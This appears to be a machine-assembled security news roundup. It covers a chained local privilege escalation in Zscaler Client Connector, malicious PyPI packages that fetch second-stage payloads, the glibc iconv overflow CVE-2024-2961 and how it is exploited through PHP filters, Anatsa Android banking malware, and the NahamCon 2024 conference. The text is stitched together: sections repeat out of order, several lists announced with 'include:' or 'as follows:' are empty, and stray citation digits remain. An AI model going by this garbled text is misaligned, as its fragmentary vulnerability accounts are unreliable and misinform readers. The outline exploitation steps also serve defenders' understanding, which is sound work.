Zero-Interaction Local Privilege Escalation in Zscaler Client Connector
A critical security issue was discovered in the Zscaler Client Connector, enabling a zero-interaction local privilege escalation. By chaining together several low-level vulnerabilities, attackers could escalate privileges and execute arbitrary commands as the NT AUTHORITY\SYSTEM service account on Windows. The vulnerabilities involved:
Exploitation was achieved through bypassing RPC validation checks, password check bypass, path traversal for arbitrary file execution, and DLL hijacking.
Discovery of a New Cluster of Malicious PyPI Packages
A new cluster of malicious packages was identified in the Python Package Index (PyPI) repository. These packages were designed to exfiltrate sensitive information, install backdoors, and perform other malicious activities upon installation. The discovery highlights the growing threat of supply chain attacks targeting open-source repositories. Key findings include:
Recommendations include verifying package integrity, using trusted sources, and employing static and dynamic analysis tools to detect malicious behavior.
Exploiting an Ancient Iconv Buffer Overflow Vulnerability in PHP
An ancient buffer overflow vulnerability in PHP’s iconv extension was rediscovered, identified as affecting versions that use certain locales. The vulnerability could allow remote code execution if exploited under specific conditions. Technical details include:
Proof-of-concept exploits demonstrate the feasibility of the attack and underscore the importance of updating and patching legacy systems.
Analysis of Anatsa (TeaBot) Malware Campaigns in Google Play Store by Zscaler ThreatLabz
Zscaler ThreatLabz conducted an in-depth analysis of Anatsa (TeaBot) malware campaigns in the Google Play Store. Anatsa is a banking trojan targeting Android devices with sophisticated capabilities. Key observations include:
A critical security flaw identified as CVE-2024-2961 has been discovered in the GNU C Library (glibc), specifically within its iconv() function. This vulnerability can be exploited by threat actors to achieve remote code execution (RCE) on systems that are affected. With a CVSS score of 8.8, this flaw is considered highly severe, highlighting the potential risk it poses to system integrity and security.
The vulnerability resides in the iconv() function of glibc’s iconv library. This function is responsible for converting text between different character encodings. The issue particularly affects conversions involving the ISO-2022-CN-EXT character set. When converting from the UCS4 charset, the iconv() function needs to add specific escape characters to indicate changes in the charset. However, the process does not properly check the boundaries of internal buffers, resulting in a buffer overflow that can write up to three bytes beyond the intended memory location.
Security researcher Charles Fol from Ambionics has provided a detailed analysis of this buffer overflow vulnerability. The overflow can be triggered in PHP applications through two primary methods:
Due to the structure of PHP’s heap, this overflow can be exploited to modify part of a free list pointer, ultimately enabling an arbitrary write primitive within the program’s memory. Consequently, an attacker with a file read vulnerability and a controlled prefix on a PHP application can achieve RCE. Similarly, forcing PHP to call iconv() with controlled parameters grants the attacker the same capability.
Proof-of-Concept (PoC) Exploit
The proof-of-concept exploit for CVE-2024-2961 involves a series of three requests, which demonstrate the steps an attacker might take to leverage this vulnerability for executing arbitrary commands on the target system:
As part of our ongoing efforts to secure the software supply chain, we continuously scan newly released PyPI and NPM packages for malicious content. This advisory details our recent identification of a particularly interesting cluster of malicious PyPI packages.
During routine triage, we identified a suspicious PyPI package named reallydonothing, published on May 9, 2024. The package exhibited several red flags:
These indicators triggered our Slack-based triage workflow, prompting further analysis by our researchers.
The package reallydonothing contained a single obfuscated Python file designed to target specific systems. It searches for a secret file whose path, when hashed, matches a predetermined value. If found, the malware downloads and executes a second-stage payload.
This report provides a technical analysis of Anatsa’s attack campaigns and an overview of recent trends in the Google Play store.
The following sequence illustrates how Anatsa malware is distributed and executed on a victim’s device:
Technical Analysis
A critical buffer overflow vulnerability has been identified in the iconv() function, existing in glibc since 2000. This vulnerability, CVE-2024-2961, allows attackers to perform a 1-to-3 byte overflow in memory, which can be exploited under specific conditions. Despite the seemingly minimal overflow capability, the vulnerability has far-reaching implications, especially when combined with file read primitives in PHP.
The vulnerability stems from an improper handling of the output buffer in the iconv() function. Specifically, when converting to certain character sets like ISO-2022-CN-EXT, iconv() can write more bytes than specified, leading to a buffer overflow.
The following proof-of-concept demonstrates the overflow:
$ gcc -o poc ./poc.c && ./poc
Remaining bytes (should be > 0): -1
000000: 41 41 41 41 41 1b 24 2a 48 00 00 00 00 00 00 00 AAAA A.$* H… ….
Conditions and Exploitation
For this overflow to be exploitable, two primary conditions must be met:
Initial research into potential targets identified several high-profile libraries and binaries, such as libxml2 and pkexec. While these targets were not directly exploitable due to buffer size management, they highlighted the potential risk.
Exploitation in PHP
The most promising exploitation vector involves PHP’s handling of filters and heap memory. By using the convert.iconv filter in PHP, an attacker can manipulate the memory layout and execute arbitrary code. The process involves leveraging PHP’s heap management and free list to achieve a controlled memory corruption.
Steps to Exploitation:
Recently, a series of vulnerabilities were discovered in Zscaler Client Connector, leading to a zero-interaction local privilege escalation exploit. This report outlines the discovery, exploitation, and mitigation of these vulnerabilities, which include incorrect type validation, lack of input sanitization, and arbitrary file deletion. The vulnerabilities were chained together to allow a standard user to escalate privileges and execute arbitrary commands as the NT AUTHORITY\SYSTEM service account on Windows.
CVE-2023-41969: ZSATrayManager Arbitrary File Deletion
CVE-2023-41972: Revert Password Check Incorrect Type Validation
CVE-2023-41973: Lack of Input Sanitization Leading to Arbitrary Code Execution
The vulnerabilities were chained together to achieve privilege escalation:
Zscaler Client Connector is a local desktop client used to connect to Zscaler’s network tunnels. It consists of two main processes:
These processes communicate using Microsoft Remote Procedure Call (RPC).
Vulnerability 1: ZSATrayManager Arbitrary File Deletion (CVE-2023-41969)
Discovered by Winston Ho, this vulnerability allows arbitrary file deletion through ZSATrayManager’s RPC interface. Details of this vulnerability can be found in the original Medium blog post.
Vulnerability 2: Revert Password Check Incorrect Type Validation (CVE-2023-41972)
ZSATrayManager does not properly validate the pwdType parameter in the PERFORM_APP_REVERT function, allowing attackers to bypass password checks by specifying an incorrect password type. This flaw can be exploited as follows:
NahamCon 2024 is a virtual security conference that took place from May 23 to May 25, 2024. It’s a significant event in the cybersecurity community, featuring a variety of activities including Capture The Flag (CTF) competitions, workshops, and presentations from renowned speakers in the field123.
The conference schedule was packed with insightful talks covering topics such as WordPress hacking, WAF bypass techniques, and practical applications of AI in bounty hunting2. Some notable presentations included:
The NahamCon CTF 2024 was a 48-hour competition that challenged participants with a range of security-related puzzles and tasks3.
Participants and attendees were encouraged to share their experiences and connect with others using the hashtag #NahamCon2024 on social media platforms12.
Overall, NahamCon 2024 provided a platform for security enthusiasts and professionals to learn, network, and showcase their skills in a collaborative and engaging environment.